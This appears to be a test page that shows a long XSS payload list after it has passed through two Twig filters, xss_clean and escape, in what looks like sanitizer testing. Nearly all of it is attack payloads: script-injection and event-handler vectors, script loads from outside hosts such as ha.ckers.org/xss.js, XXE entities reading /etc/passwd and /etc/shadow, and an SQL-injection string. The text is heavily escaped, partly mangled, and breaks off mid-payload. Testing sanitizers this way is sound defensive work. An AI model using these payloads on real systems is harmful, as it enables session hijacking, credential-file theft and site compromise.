dynsrc=\\\";\\\">\\r\\n<bgsound src=\\\";\\\">\\r\\n&document.vulnerable=true;\\r\\n&{document.vulnerable=true;};\\r\\n<img src=&{document.vulnerable=true;};>\\r\\n<link rel=\\\"stylesheet\\\" href=\\\";\\\">\\r\\n<iframe src=\\\";\\\">\\r\\n<img src=\\\";\\\">\\r\\n<img src=\\\";\\\">\\r\\n<a href=\\\"about:document.vulnerable=true;\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\">\\r\\n<body =\\\"document.vulnerable=true;\\\">\\r\\n<div style=\\\"background-image: url(;);\\\">\\r\\n<div style=\\\"behaviour: url([link to code]);\\\">\\r\\n<div style=\\\"binding: url([link to code]);\\\">\\r\\n<div style=\\\"width: document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\";\\\">\\r\\n<style><!--</style>document.vulnerable=true;//-->\\r\\n<document.vulnerable=true;\\r\\n<![<!--]]document.vulnerable=true;//-->\\r\\n<!-- -- -->document.vulnerable=true;<!-- -- -->\\r\\n<img src=\\\"blah\\\"=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"blah>\\\" =\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\";\\\">\\r\\n<xml id=\\\"X\\\"><a><b>document.vulnerable=true;;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n<script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\">\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js>\\\'\\\"-->\\r\\n<script a=\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script =\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=\\\">\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script \\\"a=\\\'>\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=`>` SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<script a=\\\">\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n(\\\"<SCRI\\\");PT SRC=\\\"http://www.securitycompass.com/xss.js\\\">\\r\\n<div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n\\\";>;<;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\n<;/script>;<;script>;alert(1)<;/script>;\\r\\n<;/br style=a:alert())>;\\r\\n<;scrscriptipt>;alert(1)<;/scrscriptipt>;\\r\\n<;br size=\\\\\\\";&;{alert('XSS')}\\\\\\\";>;\\r\\nperl -e 'print \\\\\\\";<;IMG SRC=java\\\\0script:alert(\\\\\\\";XSS\\\\\\\";)>;\\\\\\\";;' >; out\\r\\nperl -e 'print \\\\\\\";<;SCR\\\\0IPT>;alert(\\\\\\\";XSS\\\\\\\";)<;/SCR\\\\0IPT>;\\\\\\\";;' >; out\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression=\\\"http://www.procheckup.com/?sid=\\\"+)>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS STYLE=xss:alert(\\\'XSS\\\'))>\\r\\n\\\">alert(\\\'XSS\\\')\\r\\n</XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS STYLE=xss:alert(\\\'XSS\\\'))>\\r\\n>\\\">alert(\\\"XSS\\\")&\\r\\n\\\"><STYLE>@import\\\"(\\\'XSS\\\')\\\";</STYLE>\\r\\n>\\\"\\\'><img src=(" XSS Test Successful")>\\r\\n>"'><img src="(' XSS')">\\r\\n\\\'<script>alert(\\\'XSS\\\')</script>\\\'\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=("XSS<WBR>")>\\r\\n<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>\\r\\n<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> \\r\\n<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>\\r\\n<IMG SRC=\\\"(<WBR>\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"(<WBR>\\\'XSS\\\');\\\">\\r\\n<![CDATA[var n=0;while(true){n++;}]]>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(\\\'gotcha\\\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[\\\' or 1=1 or \\\'\\\'=\\\']]></foof>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file://c:/boot.ini\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/shadow\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///dev/random\\\">]><foo>&xee;</foo>\\r\\nalert(\\\'XSS\\\')\\r\\n\\r\\n">\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=("XSS")>\\r\\n<IMG SRC=(\\\'XSS\\\')> \\r\\n<img src=xss =alert(1)>\\r\\n<IMG \\\"\\\"\\\">alert(\\\"XSS\\\")\\\">\\r\\n<IMG SRC=(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=('XSS')>\\r\\n<IMG SRC=('XSS')>\\r\\n<IMG SRC=('XSS')>\\r\\n<BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<BODY =alert(\\\'XSS\\\')>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n<alert(\\\"XSS\\\");//<\\r\\n\\r\\n\\\"><s\\\"+\\\"cript>alert()\\r\\nfooalert(1)\\r\\nalert(1)\\r\\nString.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>alert(String.fromCharCode(88,83,83))\\r\\n<marquee =\\\'(\\\'1\\\');\\\'>=(◕_◕)=

by 11 | at 2021-08-19 09:46:32

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<input value=\\\"``>
\\r\\n\\>\\r\\n\\>\\r\\n\\r\\n
x\\r\\n<? foo=\\\">\\\">\\r\\n<! foo=\\\">\\\">\\r\\n</ foo=\\\">\\\">\\r\\n<? foo=\\\"><x foo=\\\'?>\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo>\\\">\\r\\n<% foo><x foo=\\\"%>\\\">\\r\\n<div id=d><x xmlns=\\\"><iframe ></div> \\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img\\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img \\\\>\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img[>\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<img >\\r\\n<a >XXX</a>\\r\\n<img >(1)\\\"` `>\\r\\n<img >\\></title><title title=>\\r\\n<a ></a><img ><img ></a>\\\">\\r\\n<!--[if]>\\r\\n<!--[if<img > -->\\></object> <object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" ><param name=postdomevents /></object>\\r\\n<a >X\\r\\n<style>p[foo=bar{}*{-o-link:\\\'(1)\\\'}{}*{-o-link-source:current}]{color:red};</style>\\r\\n<link rel=stylesheet href=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# ></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV >\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV alert(\\\'XSS\\\'));\\\">\\r\\n<BASE HREF=\\\"(\\\'XSS\\\');//\\\">\\r\\n <OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"></OBJECT>\\r\\n<EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert(\\\"XSS\\\")\\\'); ?>\\r\\n<IMG >\\>\\r\\n <HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n` SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<iframe src=\\\" (1) \\\">\\r\\n<svg><style>{font-family:\\\'<iframe/>\\\'\\r\\n<input/><isindex >\\>\\>\\\">\\/>\\r\\n<svg>\r\\n<svg>\\r\\n<iframe src=)>\\r\\n<form><a >X\\r\\n<img/*/>\\r\\n<img/ >\\r\\n<form><iframe src=\\\"(1)\\\" ;>\\r\\n<a >X</a\\r\\nhttp://www.googlealert)\r\\n<a >XYZ</a\\r\\n<img/>alert(String.fromCharCode(49))^__^\\r\\n</style ><input type=\\\"date\\\" >\\r\\n<form><textarea >\\r\\n\\r\\n<a >X</a>\\r\\n\\r\\n<style/ > alert (1)>\\r\\n<///style///><span / >SPAN\\r\\n<img/><svg><style>{-o-link-source:\\\'<body/>\\\'\\r\\n <blink/ >OnMouseOver {Firefox & Opera}\\r\\n<marquee >^__^\\r\\n<div/>X</div> {IE7}\\r\\n<iframe// src=(1)\\r\\n//<form/action=()><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/ /*iframe/src*/>\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n</font>/<svg><style>{src:\\\'<style/>\\\'</font>/</style>\\r\\n<a/><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/>\\\'\\\'<svg>alert(1) {Opera}\\r\\n<a ><button>\\r\\n<div >DIV</div>\\r\\n<iframe >\\r\\n<a >X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var >On Mouse Over</var>\\r\\n<a >Click Here</a>\\r\\n<img >\\r\\n<%<!--\\\'%>\\r\\n\\r\\n<iframe/src \\\\/\\\\/ value=<><iframe/src=(1)\\r\\n<input type=\\\"text\\\" value=`` <div/>X</div>\\r\\n<iframe src=( 1 )></iframe>\\r\\n<img >\\></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/>\\r\\n<math><a >click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs>\\\">X</a\\r\\n<iframe/ worksinIE>\\r\\na=\\\a & /=/\\r\\n\r\\n<object data=\\\alert(1)>\\r\\n\\r\\n<body/ alert(1)>\\r\\n/*\\r\\n<svg> alert(1)\\r\\n<a >ClickMe\\r\\n alert(1) 1=2\\r\\n<div/> style=\\\"x:\\\">\\r\\n<--`<img/> --!>\\>x</button>\\r\\n\\\"><img >\\r\\n<form><button >CLICKME\\r\\n<math><a >click\\r\\n<object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\"data:text/html,\\\"></iframe>\\r\\n<a > \\\">Click Me</a>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n\\\'>//\\\\\\\\,<\\\'>\\\">\\\">\\\"*\\\"\\r\\n\\\'); alert(\\\'XSS\\r\\n\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG \\\"\\\"\\\">\\\">\\r\\n<scralert(\\\'XSS\\\');\\r\\n \\r\\n<img />\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\\\\\"XSS\\\\\\\")\\\';</style>\\r\\n<? echo(\\\'<scr)\\\'; echo(\\\'ipt>alert(\\\\\\\"XSS\\\\\\\")\\\'); ?>\\r\\n<marquee></marquee>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n\\\">\\r\\n\\r\\n</title>\\r\\n</textarea>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<font >\\r\\n<img >\\>\\/></a></><img >\\>\\r\\n<iframe<?php echo chr(11)?> ></iframe>\\r\\n\\\">\\r\\n\\\'>><marquee><h1>XSS</h1></marquee>\\r\\n\\\'\\\">>\\r\\n\\\'\\\">><marquee><h1>XSS</h1></marquee>\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\">\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\">\\r\\n\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<?=\\\'\\\'?>\\r\\n<IMG >\\> <\\\"\\r\\n<FRAMESET><FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"></FRAMESET>\\r\\n<STYLE>li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}</STYLE><UL><LI>XSS\\r\\nperl -e \\\'print \\\\\\\"<SCR\\\\0IPT>alert(\\\\\\\"XSS\\\\\\\")</SCR\\\\0IPT>\\\\\\\";\\\' > out\\r\\nperl -e \\\'print \\\\\\\"<IMG >\\\\\\\";\\\' > >\\r\\n<scrscriptipt>alert(1)</scrscriptipt>\\r\\n</br >\\r\\n\\r\\n\\\"><BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n[color=red width=alert(123))][color]\\r\\n<BASE HREF=\\\"(\\\'XSS\\\');//\\\">\\r\\nExecute(MsgBox(chr(88)&chr(83)&chr(83)))<\\r\\n\\\"></iframe>

result with twig: {{ xss.xss | escape }}:

<b <script>alert(1)</script>0\\r\\n<div id=\\\"div1\\\"><input value=\\\"``onmouseover=javascript:alert(1)\\\"></div> <div id=\\\"div2\\\"></div><script>document.getElementById(\\\"div2\\\").innerHTML = document.getElementById(\\\"div1\\\").innerHTML;</script>\\r\\n<x \\\'=\\\"foo\\\"><x foo=\\\'><img src=x onerror=javascript:alert(1)//\\\'>\\r\\n<embed src=\\\"javascript:alert(1)\\\">\\r\\n<img src=\\\"javascript:alert(1)\\\">\\r\\n<image src=\\\"javascript:alert(1)\\\">\\r\\n<script src=\\\"javascript:alert(1)\\\">\\r\\n<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x\\r\\n<? foo=\\\"><script>javascript:alert(1)</script>\\\">\\r\\n<! foo=\\\"><script>javascript:alert(1)</script>\\\">\\r\\n</ foo=\\\"><script>javascript:alert(1)</script>\\\">\\r\\n<? foo=\\\"><x foo=\\\'?><script>javascript:alert(1)</script>\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo><script>javascript:alert(1)</script>\\\">\\r\\n<% foo><x foo=\\\"%><script>javascript:alert(1)</script>\\\">\\r\\n<div id=d><x xmlns=\\\"><iframe onload=javascript:alert(1)\\\"></div> <script>d.innerHTML=d.innerHTML</script>\\r\\n<img \\\\x00src=x onerror=\\\"alert(1)\\\">\\r\\n<img \\\\x47src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x11src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x12src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x47src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x10src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x13src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x32src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x47src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img\\\\x11src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x47src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x34src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x39src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img \\\\x00src=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x09=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x10=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x13=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x32=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x12=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x11=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x00=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src\\\\x47=x onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src=x\\\\x09onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src=x\\\\x10onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src=x\\\\x11onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src=x\\\\x12onerror=\\\"javascript:alert(1)\\\">\\r\\n<img src=x\\\\x13onerror=\\\"javascript:alert(1)\\\">\\r\\n<img[a][b][c]src[d]=x[e]onerror=[f]\\\"alert(1)\\\">\\r\\n<img src=x onerror=\\\\x09\\\"javascript:alert(1)\\\">\\r\\n<img src=x onerror=\\\\x10\\\"javascript:alert(1)\\\">\\r\\n<img src=x onerror=\\\\x11\\\"javascript:alert(1)\\\">\\r\\n<img src=x onerror=\\\\x12\\\"javascript:alert(1)\\\">\\r\\n<img src=x onerror=\\\\x32\\\"javascript:alert(1)\\\">\\r\\n<img src=x onerror=\\\\x00\\\"javascript:alert(1)\\\">\\r\\n<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>\\r\\n<img src=\\\"x` `<script>javascript:alert(1)</script>\\\"` `>\\r\\n<img src onerror /\\\" \\\'\\\"= alt=javascript:alert(1)//\\\">\\r\\n<title onpropertychange=javascript:alert(1)></title><title title=>\\r\\n<a href=http://foo.bar/#x=`y></a><img alt=\\\"`><img src=x:x onerror=javascript:alert(1)></a>\\\">\\r\\n<!--[if]><script>javascript:alert(1)</script -->\\r\\n<!--[if<img src=x onerror=javascript:alert(1)//]> -->\\r\\n<script src=\\\"/\\\\%(jscript)s\\\"></script>\\r\\n<script src=\\\"\\\\\\\\%(jscript)s\\\"></script>\\r\\n<object id=\\\"x\\\" classid=\\\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\\\"></object> <object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" onqt_error=\\\"javascript:alert(1)\\\" style=\\\"behavior:url(#x);\\\"><param name=postdomevents /></object>\\r\\n<a style=\\\"-o-link:\\\'javascript:javascript:alert(1)\\\';-o-link-source:current\\\">X\\r\\n<style>p[foo=bar{}*{-o-link:\\\'javascript:javascript:alert(1)\\\'}{}*{-o-link-source:current}]{color:red};</style>\\r\\n<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\\r\\n<style>@import \\\"data:,*%7bx:expression(javascript:alert(1))%7D\\\";</style>\\r\\n<a style=\\\"pointer-events:none;position:absolute;\\\"><a style=\\\"position:absolute;\\\" onclick=\\\"javascript:alert(1);\\\">XXX</a></a><a href=\\\"javascript:javascript:alert(1)\\\">XXX</a>\\r\\n<style>*[{}@import\\\'%(css)s?]</style>X\\r\\n<div style=\\\"font-family:\\\'foo&#10;;color:red;\\\';\\\">XXX\\r\\n<div style=\\\"font-family:foo}color=red;\\\">XXX\\r\\n<// style=x:expression\\\\28javascript:alert(1)\\\\29>\\r\\n<style>*{x:expression(javascript:alert(1))}</style>\\r\\n<div style=content:url(%(svg)s)></div>\\r\\n<div style=\\\"list-style:url(http://foo.f)\\\\20url(javascript:javascript:alert(1));\\\">X\\r\\n<div id=d><div style=\\\"font-family:\\\'sans\\\\27\\\\3B color\\\\3Ared\\\\3B\\\'\\\">X</div></div> <script>with(document.getElementById(\\\"d\\\"))innerHTML=innerHTML</script>\\r\\n<div style=\\\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\\\">X\\r\\n<div style=\\\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\\\">X\\r\\n<div id=\\\"x\\\">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>\\r\\n<x style=\\\"background:url(\\\'x&#1;;color:red;/*\\\')\\\">XXX</x>\\r\\n<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>\\r\\n<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>\\r\\n<script>ReferenceError.prototype.__defineGetter__(\\\'name\\\', function(){javascript:alert(1)}),x</script>\\r\\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\'javascript:alert(1)\\\')()</script>\\r\\n<meta charset=\\\"x-imap4-modified-utf7\\\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\\r\\n<meta charset=\\\"x-imap4-modified-utf7\\\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\\r\\n<meta charset=\\\"mac-farsi\\\">¼script¾javascript:alert(1)¼/script¾\\r\\nX<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >\\r\\n1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>\\r\\n1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>\\r\\n<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>\\r\\n1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>\\r\\n<a style=\\\"behavior:url(#default#AnchorClick);\\\" folder=\\\"javascript:javascript:alert(1)\\\">XXX</a>\\r\\n<x style=\\\"behavior:url(%(sct)s)\\\">\\r\\n<xml id=\\\"xss\\\" src=\\\"%(htc)s\\\"></xml> <label dataformatas=\\\"html\\\" datasrc=\\\"#xss\\\" datafld=\\\"payload\\\"></label>\\r\\n<event-source src=\\\"%(event)s\\\" onload=\\\"javascript:alert(1)\\\">\\r\\n<a href=\\\"javascript:javascript:alert(1)\\\"><event-source src=\\\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\\\">\\r\\n<div id=\\\"x\\\">x</div> <xml:namespace prefix=\\\"t\\\"> <import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"> <t:set attributeName=\\\"innerHTML\\\" targetElement=\\\"x\\\" to=\\\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;\\\">\\r\\n<script>%(payload)s</script>\\r\\n<script src=%(jscript)s></script>\\r\\n<script language=\\\'javascript\\\' src=\\\'%(jscript)s\\\'></script>\\r\\n<script>javascript:alert(1)</script>\\r\\n<IMG SRC=\\\"javascript:javascript:alert(1);\\\">\\r\\n<IMG SRC=javascript:javascript:alert(1)>\\r\\n<IMG SRC=`javascript:javascript:alert(1)`>\\r\\n<SCRIPT SRC=%(jscript)s?<B>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:javascript:alert(1);\\\"></FRAMESET>\\r\\n<BODY ONLOAD=javascript:alert(1)>\\r\\n<BODY ONLOAD=javascript:javascript:alert(1)>\\r\\n<IMG SRC=\\\"jav ascript:javascript:alert(1);\\\">\\r\\n<BODY onload!#$%%&()*~+-_.,:;?@[/|\\\\]^`=javascript:alert(1)>\\r\\n<SCRIPT/SRC=\\\"%(jscript)s\\\"></SCRIPT>\\r\\n<<SCRIPT>%(payload)s//<</SCRIPT>\\r\\n<IMG SRC=\\\"javascript:javascript:alert(1)\\\"\\r\\n<iframe src=%(scriptlet)s <\\r\\n<INPUT TYPE=\\\"IMAGE\\\" 